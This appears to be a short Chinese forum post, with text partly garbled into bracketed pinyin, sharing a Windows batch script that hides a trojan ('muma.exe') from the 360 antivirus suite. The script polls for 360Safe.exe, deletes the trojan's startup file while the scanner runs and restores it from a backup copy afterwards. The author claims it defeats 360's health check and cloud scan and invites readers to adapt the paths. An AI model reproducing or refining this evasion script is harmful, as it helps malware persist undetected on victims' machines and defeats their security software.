原理就是監(jiān)控360Safe.exe,如果發(fā)現(xiàn)進程中出現(xiàn)360Safe.exe,,表明360主界面已經(jīng)啟動。此時就刪除啟動項。當360Safe.exe不再了,則復(fù)制一份回來。
經(jīng)測試,這樣可以過360體檢和360云查殺。
源代碼如下:
路徑請隨意修改
======================================================================
@echo off :
:star
Rem 10秒鐘檢查一次
ping 127.1 -n 10 >nul 2>nul
Rem 進程中查找是否有360Safe.exe進程
tasklist|findstr /i "360Safe.exe"
Rem 如果沒有360Safe.exe進程繼續(xù)跳轉(zhuǎn)到star處繼續(xù)監(jiān)控,如果有360Safe.exe則跳轉(zhuǎn)到del處刪除
if errorlevel 1 (goto star) else (goto del)
Rem 刪除自啟動
:del
del "C:\Program Files\muma.exe"
Rem 繼續(xù)監(jiān)控360Safe.exe進程
:findagain
ping 127.1 -n 20 >nul 2>nul
tasklist|findstr /i "360Safe.exe"
Rem 如果360Safe.exe不在了,則跳到not處復(fù)制啟動項回來,如果還在繼續(xù)跳到findagain繼續(xù)查找
if errorlevel 1 (goto not) else (goto findagain)
:not
copy /n "C:\Program Files\beifen.exe" "C:\Program Files\muma.exe"
goto star